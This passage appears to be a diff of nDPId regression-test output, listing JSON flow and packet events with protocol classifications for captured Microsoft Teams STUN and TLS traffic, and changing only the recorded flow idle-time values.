00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2494,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693597,"flow_last_seen":1587041693597,"flow_idle_time":180000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1587041693597,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2494,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1587041693597,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"thread_ts_msec":1587041693597,"pkt":"EBMx8Tl2KDc3AG3ICABFAADyLLYAAEARXJfAqAEGNHL6jcNgDZYA3iTJAAMAwiESpEIiL+\/H85JL0bmXJ+QADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAKAlQAIfyDE3U+EjfoAFAAUAk7L+IJ6YNZTBt6\/p32H0UQC3V0AFQAKInJ0Y21lZGlhIgAGADgCAAAkkKDb2wHWGU3iFTe\/yZKgAzJzGvG+3Faa6DvVqwAAAAC\/cbJ2yXgTqN3v61y8eTonekzmPAAIACB+ROZSH0cQpVQPYpCmfWn5X6jy8HHHqFihd3XDn9tzDQ=="} 00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2494,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693597,"flow_last_seen":1587041693597,"flow_idle_time":180000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1587041693597,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} @@ -415,9 +415,9 @@ 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2511,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1587041693611,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1587041693611,"pkt":"EBMx8Tl2KDc3AG3ICABFAABgfyMAAEARCrzAqAEGNHL6jcNhDZYATBjuAAMAMCESpELalY8VcoE3uJ+0vVMADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAI="} 00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2511,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693611,"flow_last_seen":1587041693611,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693611,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50017,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 00689{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2515,"source":"teams.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1587041693625,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":1587041693625,"pkt":"KDc3AG3IEBMx8Tl2CABFAADXVxUAAGwRBmU0cvp7wKgBBg2Ww3QAwyhaARMApyESpEI9x0RmdejywONbcT4ADwAEcsZLxoAIAAQAAAAGAAkAPQAABAFUaGUgcmVxdWVzdCBkaWQgbm90IGNvbnRhaW4gYSBNZXNzYWdlLUludGVncml0eSBhdHRyaWJ1dGUADgAIAAENljRy+okAFAAUPK7\/QeTw1Z9oICgNLxST+LDzEgAAFQAKInJ0Y21lZGlhIgABAAgAAQ2YNHL6iYCVAAhb5VsGDC2J+oAgAAgAAc5scadqCg=="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2516,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1587041693628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041693628,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0Nx9AAGwG5wg0cvp7wKgBBgG7w2XeqFvwXFlWKYAS\/\/\/MOwAAAgQFoAEDAwgBAQQC"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2517,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1587041693628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041693628,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGSjTAqAEGNHL6e8NlAbtcWVYp3qhb8VAQIADs+gAA"} -00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2518,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693582,"flow_last_seen":1587041693628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1587041693628,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2516,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1587041693628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041693628,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0Nx9AAGwG5wg0cvp7wKgBBgG7w2XeqFvwXFlWKYAS\/\/\/MOwAAAgQFoAEDAwgBAQQC"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2517,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1587041693628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041693628,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGSjTAqAEGNHL6e8NlAbtcWVYp3qhb8VAQIADs+gAA"} +00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2518,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693582,"flow_last_seen":1587041693628,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1587041693628,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2519,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1587041693640,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":195,"pkt_l4_len":161,"thread_ts_msec":1587041693640,"pkt":"KDc3AG3IEBMx8Tl2CABFAAC1fJUAAGwR4QY0cvp7wKgBBg2Ww2AAoaFUAQMAhSESpEIiL+\/H85JL0bmXJ+QADwAEcsZLxgANAAQAAAA8AAEACAABDZg0cvqNgAgABAAAAAaAIAAIAAHB1XGnagqAUAAYm3E8YjrBv7v21SN1g6+m0xjhRrQAAAAAgCIACTIuMC4xLjIxMQAQAAQAAC7gAAgAIK\/9w8VcH20Bp+o9r1mX6tB+MRypEJNYTX2DO\/tetQep"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2520,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693654,"flow_last_seen":1587041693654,"flow_idle_time":180000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":214,"midstream":0,"thread_ts_msec":1587041693654,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50036,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2520,"source":"teams.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1587041693654,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"thread_ts_msec":1587041693654,"pkt":"EBMx8Tl2KDc3AG3ICABFAADySXIAAEARP9\/AqAEGNHL6icN0DZYA3q9FAAMAwiESpELOvwn047sA+HEU4bYADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAKAlQAIW+VbBgwtifoAFAAUPK7\/QeTw1Z9oICgNLxST+LDzEgAAFQAKInJ0Y21lZGlhIgAGADgCAAAkkKDb2wHWGU3iFTe\/yZKgAzJzGvG+3Faa6DvVqwAAAAC\/cbJ2yXgTqN3v61y8eTonekzmPAAIACCU7UyKuDgKSJKUvk8SSs9ovhsGMp06Kok2oE1dFOuKzQ=="} @@ -430,28 +430,28 @@ 00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2543,"source":"teams.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":1587041693711,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"thread_ts_msec":1587041693711,"pkt":"EBMx8Tl2KDc3AG3ICABFAADyfgoAAEARC0PAqAEGNHL6jcNhDZYA3rEpAAMAwiESpEJLDXUDhL3sfvdJg10ADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAKAlQAIkFC\/JA7FjfoAFAAUPpo\/SSn4PJAIkOO6zaqfvtmAt1IAFQAKInJ0Y21lZGlhIgAGADgCAAAkkKDb2wHWGU3iFTe\/yZKgAzJzGvG+3Faa6DvVqwAAAAC\/cbJ2yXgTqN3v61y8eTonekzmPAAIACBfcijkK3I1E6fsjRiPsKvs33Xfpf\/cKnDyh7VrIY168g=="} 00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2545,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1587041693714,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":1587041693714,"pkt":"KDc3AG3IEBMx8Tl2CABFAADXVxcAAGwRBlU0cvqJwKgBBg2Ww3UAwwtKARMApyESpEJNv3gTxWrFDZ5wS8sADwAEcsZLxoAIAAQAAAAGAAkAPQAABAFUaGUgcmVxdWVzdCBkaWQgbm90IGNvbnRhaW4gYSBNZXNzYWdlLUludGVncml0eSBhdHRyaWJ1dGUADgAIAAENljRy+okAFAAUc60+h2VE9PTAWxn4K2V6NOmKA20AFQAKInJ0Y21lZGlhIgABAAgAAQ2YNHL6iYCVAAjDwJ1K7o6J+oAgAAgAAcBocadqCg=="} 00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2552,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1587041693763,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":256,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":256,"pkt_l4_len":222,"thread_ts_msec":1587041693763,"pkt":"EBMx8Tl2KDc3AG3ICABFAADy1jgAAEARsxjAqAEGNHL6icN1DZYA3qn\/AAMAwiESpEK\/FrW6Bpt+jaFgT0IADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAKAlQAIw8CdSu6OifoAFAAUc60+h2VE9PTAWxn4K2V6NOmKA20AFQAKInJ0Y21lZGlhIgAGADgCAAAkkKDb2wHWGU3iFTe\/yZKgAzJzGvG+3Faa6DvVqwAAAAC\/cbJ2yXgTqN3v61y8eTonekzmPAAIACAOMJjC3yWHP2a8uRvQ6tdNq4Cf2VvwjY\/Ply+68rS7wg=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2559,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693828,"flow_last_seen":1587041693828,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041693828,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2559,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1587041693828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041693828,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGSf\/AqAEGNHL6mMNeAbvdNMkXAAAAALAC\/\/\/QFQAAAgQFtAEDAwUBAQgKMITaQwAAAAAEAgAA"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2562,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693849,"flow_last_seen":1587041693849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041693849,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2562,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1587041693849,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041693849,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGSf7AqAEGNHL6mcN0AbuMksvlAAAAALAC\/\/8dvwAAAgQFtAEDAwUBAQgKMITaVwAAAAAEAgAA"} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2564,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1587041693869,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041693869,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0nZxAAGwGgG40cvqYwKgBBgG7w17cXACa3TTJGIAS\/\/81\/QAAAgQFoAEDAwgBAQQC"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2565,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1587041693869,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041693869,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGShfAqAEGNHL6mMNeAbvdNMkY3FwAm1AQIABWvAAA"} -00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2566,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693828,"flow_last_seen":1587041693869,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041693869,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.152","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2567,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1587041693893,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041693893,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0NypAAGwG5t80cvqZwKgBBgG7w3QJhgXYjJLL5oAS\/\/9RUwAAAgQFoAEDAwgBAQQC"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2568,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1587041693893,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041693893,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGShbAqAEGNHL6mcN0AbuMksvmCYYF2VAQIAByEgAA"} -00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2569,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693849,"flow_last_seen":1587041693893,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1587041693893,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.153","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01507{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2585,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1587041693828,"flow_last_seen":1587041693913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6300,"flow_avg_l4_payload_len":450,"midstream":0,"thread_ts_msec":1587041693913,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.152","server_names":"tr.teams.microsoft.com,*.tr.teams.microsoft.com,turn.teams.microsoft.com,*.turn.teams.microsoft.com,*.relay.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 5","subjectDN":"CN=tr.teams.microsoft.com","fingerprint":"A7:90:8D:41:ED:24:D2:83:48:95:90:CE:18:D3:A6:C2:62:7A:07:75"}} -01507{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2603,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1587041693849,"flow_last_seen":1587041693938,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6300,"flow_avg_l4_payload_len":484,"midstream":0,"thread_ts_msec":1587041693938,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"52.114.250.153","server_names":"tr.teams.microsoft.com,*.tr.teams.microsoft.com,turn.teams.microsoft.com,*.turn.teams.microsoft.com,*.relay.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 5","subjectDN":"CN=tr.teams.microsoft.com","fingerprint":"A7:90:8D:41:ED:24:D2:83:48:95:90:CE:18:D3:A6:C2:62:7A:07:75"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2632,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041694219,"flow_last_seen":1587041694219,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041694219,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2632,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1587041694219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041694219,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9w\/AqAEGNHJNiOyXAbs8mpamAAAAALAC\/\/8lfgAAAgQFtAEDAwUBAQgKMITbvgAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2559,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693828,"flow_last_seen":1587041693828,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041693828,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.152","src_port":50014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2559,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1587041693828,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041693828,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGSf\/AqAEGNHL6mMNeAbvdNMkXAAAAALAC\/\/\/QFQAAAgQFtAEDAwUBAQgKMITaQwAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2562,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693849,"flow_last_seen":1587041693849,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041693849,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2562,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1587041693849,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041693849,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGSf7AqAEGNHL6mcN0AbuMksvlAAAAALAC\/\/8dvwAAAgQFtAEDAwUBAQgKMITaVwAAAAAEAgAA"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2564,"source":"teams.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1587041693869,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041693869,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0nZxAAGwGgG40cvqYwKgBBgG7w17cXACa3TTJGIAS\/\/81\/QAAAgQFoAEDAwgBAQQC"} 